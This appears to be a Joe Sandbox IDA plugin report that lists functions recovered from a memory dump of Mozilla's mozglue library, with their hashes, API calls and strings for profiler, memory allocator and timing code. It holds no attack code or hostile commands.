Opcode ID: 1bab59ac049070ac9994067d192ff74a973ecc0749bd1c97355f1a33a3af7459
Instruction ID: ceef1a55ebc0c24612776b07c3164acd67edd71e9389a067b0dd6077c732406c
Opcode Fuzzy Hash: 1bab59ac049070ac9994067d192ff74a973ecc0749bd1c97355f1a33a3af7459
Instruction Fuzzy Hash: 2381F370B90300ABEF189FA8E954B697FEEFB56700F104A29EE0597381D779D406CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BFAA0 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 193threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0BFADC
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BFAE9
GetCurrentThreadId.KERNEL32 ref: 6B0BFB31
GetCurrentThreadId.KERNEL32 ref: 6B0BFB43
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6B0BFBF6
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0BFC50

Strings

[D %d/%d] profiler_unregister_thread: %s, xrefs: 6B0BFC94
[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6B0BFD15

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
API String ID: 2101194506-3679350629
Opcode ID: fffff4a4dfc8fea39d83ba0362bf7a70020def8516ab0fc4d7aa7adcbca02b2c
Instruction ID: 63c0d945c9514c76e550a97aef00745acba72b80edd2bcf9a38d847c88e9389d
Opcode Fuzzy Hash: fffff4a4dfc8fea39d83ba0362bf7a70020def8516ab0fc4d7aa7adcbca02b2c
Instruction Fuzzy Hash: E371D078A04700CFD718DF28D545B6ABFE9FF86304F01456AED4687352EB3AA845CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6B073AB0 Relevance: 24.2, APIs: 13, Strings: 3, Instructions: 240COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6B0FE768,?,00003000,00000004), ref: 6B073AC5
LeaveCriticalSection.KERNEL32(6B0FE768,?,00003000,00000004), ref: 6B073AE5
VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6B073AFB
VirtualFree.KERNEL32(?,00100000,00004000), ref: 6B073B57
EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073B81
LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073BA3
EnterCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073BAE
LeaveCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073C74
EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073C8B
LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073C9F
LeaveCriticalSection.KERNEL32(6B0FE7B8), ref: 6B073D5C
EnterCriticalSection.KERNEL32(6B0FE784), ref: 6B073D67
LeaveCriticalSection.KERNEL32(6B0FE784), ref: 6B073D8A

Part of subcall function 6B0B0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6B073DEF), ref: 6B0B0D71
Part of subcall function 6B0B0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6B073DEF), ref: 6B0B0D84

Strings

: (malloc) Error in VirtualFree(), xrefs: 6B073DCC
<jemalloc>, xrefs: 6B073DC7
MOZ_CRASH(), xrefs: 6B073DB2

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
API String ID: 2380290044-2272602182
Opcode ID: 9108fcf0f7b4fc338c785ea92b940ce2e4eb97290e099b889f7c344e1e105ed8
Instruction ID: 4467b5cebbb07a7128d04b4d9987de16f356a774b8c26a88c9d116922a789678
Opcode Fuzzy Hash: 9108fcf0f7b4fc338c785ea92b940ce2e4eb97290e099b889f7c344e1e105ed8
Instruction Fuzzy Hash: 6B91A2717003058BEF2CDF68D8C5B1EBFE6BB89350B148178E9169B285D779D802CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6B0811B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 186COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6B081213
toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6B081285
memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6B0812B9
memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6B081327

Strings

CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6B08131B
MZx, xrefs: 6B0811E1
Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6B08120D
&, xrefs: 6B08126B
TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6B0812AD

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy$toupper
String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
API String ID: 403083179-3658087426
Opcode ID: 5db9bb87904c6433894ddd187ce7e90db71f768db0f92c69d9dbc5d04d5eac9c
Instruction ID: 048322b1b794386daf54122b9bf56273626df0cb7918d9dccab17c25a9e4b325
Opcode Fuzzy Hash: 5db9bb87904c6433894ddd187ce7e90db71f768db0f92c69d9dbc5d04d5eac9c
Instruction Fuzzy Hash: 3E719271E043688ADF189F74D8007DEBFF5BF59309F04059AD559A3240D738AB85CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0731C0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 183timelibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6B073217
GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6B073236
FreeLibrary.KERNEL32 ref: 6B07324B
__Init_thread_footer.LIBCMT ref: 6B073260
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6B07327F
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B07328E
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0732AB
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0732D1
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6B0732E5
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6B0732F7

Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1

__aulldiv.LIBCMT ref: 6B07346B

Strings

KernelBase.dll, xrefs: 6B073212
QueryInterruptTime, xrefs: 6B073230

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
String ID: KernelBase.dll$QueryInterruptTime
API String ID: 3006643210-2417823192
Opcode ID: d6d815da9d3857b2003de03e690b7c4eb20bd4bd63285f216c8e05b7d72bf97f
Instruction ID: 15aabc2ce3d35b83646313602463cd53f92e8797e63895ea001051d0ac2dabdd
Opcode Fuzzy Hash: d6d815da9d3857b2003de03e690b7c4eb20bd4bd63285f216c8e05b7d72bf97f
Instruction Fuzzy Hash: 3461F2719087018BD729DF38D45171ABBE9FF8A350F20872DE8A5A3291EB34E546CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CD840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0CD85F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD86C
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD918
GetCurrentThreadId.KERNEL32 ref: 6B0CD93C
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD948
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD970
GetCurrentThreadId.KERNEL32 ref: 6B0CD976
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD982
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD9CF
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6B0CDA2E
GetCurrentThreadId.KERNEL32 ref: 6B0CDA6F
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CDA78
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6B0CDA91

Part of subcall function 6B095C50: GetTickCount64.KERNEL32 ref: 6B095D40
Part of subcall function 6B095C50: EnterCriticalSection.KERNEL32(6B0FF688), ref: 6B095D67

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CDAB7

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
String ID:
API String ID: 1195625958-0
Opcode ID: 33c3ad66d9c2eea105646895a189f969ac3a67d29a85e8e51e39c331c7547dfb
Instruction ID: a273e8c2af75ebc3dca01bd1909df01be284b1f8a18d0b93b6dab05ce3534e49
Opcode Fuzzy Hash: 33c3ad66d9c2eea105646895a189f969ac3a67d29a85e8e51e39c331c7547dfb
Instruction Fuzzy Hash: 0E718A756043049FCB04DF28C888B5EBFE5FF89310F15866AEC5A9B211EB34E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B083A90 Relevance: 18.3, APIs: 12, Instructions: 295COMMON

Download Yara Rule

APIs

AcquireSRWLockShared.KERNEL32 ref: 6B083BB4
ReleaseSRWLockShared.KERNEL32 ref: 6B083BD2
AcquireSRWLockExclusive.KERNEL32 ref: 6B083BE5
ReleaseSRWLockExclusive.KERNEL32 ref: 6B083C91
ReleaseSRWLockShared.KERNEL32 ref: 6B083CBD
moz_xmalloc.MOZGLUE ref: 6B083CF1

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Lock$ReleaseShared$AcquireExclusive$mallocmoz_xmalloc
String ID:
API String ID: 1881024734-0
Opcode ID: 56a393717032f91ccc8f7c0daf0dacf56d32b4715511cc41c4b5915effef413b
Instruction ID: 64a3e446c2ae535c7d2e4ee083ae85c4eb9d2c6b496de2b4bb01dd63c6eb4603
Opcode Fuzzy Hash: 56a393717032f91ccc8f7c0daf0dacf56d32b4715511cc41c4b5915effef413b
Instruction Fuzzy Hash: EFC14EB1904741CFCB28DF28D08475ABFE6BF89304F1585AEE9998B311D735E985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BEB90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 66threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6B0BEBAC

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

GetCurrentThreadId.KERNEL32 ref: 6B0BEBC1
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8,?,?,00000000), ref: 6B0BEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6B0BEBE5
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8,00000000), ref: 6B0BEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6B0BEC46
CloseHandle.KERNEL32(?), ref: 6B0BEC55
free.MOZGLUE(00000000), ref: 6B0BEC5C

Strings

[I %d/%d] profiler_start, xrefs: 6B0BEBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6B0BEA9B

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectReleaseSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 4250961200-1186885292
Opcode ID: 71a867fdf2c0f3295c08b5171a9f6bba586829a97c6899b67e053afbce709fbd
Instruction ID: 68d28294136a0e84cea3e11b13319ee3cda5cc91ab0a0a4a168c2919e7a06209
Opcode Fuzzy Hash: 71a867fdf2c0f3295c08b5171a9f6bba586829a97c6899b67e053afbce709fbd
Instruction Fuzzy Hash: 3111AF75A001149BCF049F74E849B5A7FADEF46369F004261FE1A97241D73AE806CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B0AF2B0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6B0AD9DB), ref: 6B0AF2D2
GetModuleHandleW.KERNEL32(ntdll.dll,00000000), ref: 6B0AF2F5
moz_xmalloc.MOZGLUE(?,?,00000000), ref: 6B0AF386
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0AF347

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0AF3C8
free.MOZGLUE(00000000,00000000), ref: 6B0AF3F3
free.MOZGLUE(00000000,00000000), ref: 6B0AF3FC
free.MOZGLUE(00000000,?,?,00000000), ref: 6B0AF413

Strings

ntdll.dll, xrefs: 6B0AF2F0

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: freemoz_xmalloc$HandleModule$malloc
String ID: ntdll.dll
API String ID: 301460908-2227199552
Opcode ID: 215eab96c7ddd8444f18d1301218ee7ffe73674415a37c21f634def7ee42904c
Instruction ID: a829bed5ea34c45bcb57c3fc0183eaec60356f3e8a8344134738419c2d2c14fd
Opcode Fuzzy Hash: 215eab96c7ddd8444f18d1301218ee7ffe73674415a37c21f634def7ee42904c
Instruction Fuzzy Hash: 6441E1B6E002049BDB0CAFA9E84179A7FF9FF45314F104829D91AE7382EB39E945C741

Uniqueness

Uniqueness Score: -1.00%

Function 6B0D6A10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6B0FF618), ref: 6B0D6A68
GetCurrentProcess.KERNEL32 ref: 6B0D6A7D
GetCurrentProcess.KERNEL32 ref: 6B0D6AA1
EnterCriticalSection.KERNEL32(6B0FF618), ref: 6B0D6AAE
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6B0D6AE1
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6B0D6B15
strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6B0D6B65
LeaveCriticalSection.KERNEL32(6B0FF618,?,?), ref: 6B0D6B83

Strings

SymInitialize, xrefs: 6B0D6BA3

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSectionstrncpy$CurrentProcess$EnterInitializeLeave
String ID: SymInitialize
API String ID: 3103739362-3981310019
Opcode ID: 4655952935df1365f19bce7c14a88377110304ded21db9dd042de4910248674b
Instruction ID: 1bbb89fe47e9664f69037f247a989b632a74f2bd2956ddf106790ea32065c282
Opcode Fuzzy Hash: 4655952935df1365f19bce7c14a88377110304ded21db9dd042de4910248674b
Instruction Fuzzy Hash: 68419F71705344AFDB00CFB4D889B9A3FEDAB46304F0441B9ED898B282EBB5D544CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6B0BDBB0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0BDBE1
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0BDBE9

Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508

??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6B0BDC5D
moz_xmalloc.MOZGLUE(00000008,00000000), ref: 6B0BDC7F

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

Part of subcall function 6B0B9A60: GetCurrentThreadId.KERNEL32 ref: 6B0B9A95
Part of subcall function 6B0B9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A9D
Part of subcall function 6B0B9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0B9ACC
Part of subcall function 6B0B9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0B9BA7
Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0B9BB8
Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0B9BC9

Part of subcall function 6B0BE8B0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6B0BDCF5), ref: 6B0BE92D

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD1B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD44
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6B0BDD58

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

Strings

[I %d/%d] locked_profiler_save_profile_to_file(%s), xrefs: 6B0BDBF2

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CurrentTimefreegetenv$ProcessStampThreadV01@@Value@mozilla@@_getpidmalloc$??1ios_base@std@@?profiler_time@baseprofiler@mozilla@@Init_thread_footerNow@Stamp@mozilla@@TerminateV12@___acrt_iob_func__stdio_common_vfprintfmoz_xmalloc
String ID: [I %d/%d] locked_profiler_save_profile_to_file(%s)
API String ID: 3378208378-1387374313
Opcode ID: 5b429fb17b45508d2c4f863af36fdaa607abacab14607c2b1b7cd9896afcdd21
Instruction ID: 42ef65c0672cdc25bb5dd7ce8c9af03732e95f30028cf8f47f30f9b9a63be35c
Opcode Fuzzy Hash: 5b429fb17b45508d2c4f863af36fdaa607abacab14607c2b1b7cd9896afcdd21
Instruction Fuzzy Hash: 95819E746007048FCB28DF24D485B6AFFE5EF89308B108A2DD89B87791DB39E949CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C0000 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 127threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F

GetCurrentThreadId.KERNEL32 ref: 6B0C0039
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0C0041
GetCurrentThreadId.KERNEL32 ref: 6B0C0075
AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C0082
moz_xmalloc.MOZGLUE(00000048), ref: 6B0C0090
free.MOZGLUE(?), ref: 6B0C0104
ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C011B

Strings

[D %d/%d] profiler_register_page(%llu, %llu, %s, %llu), xrefs: 6B0C005B

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
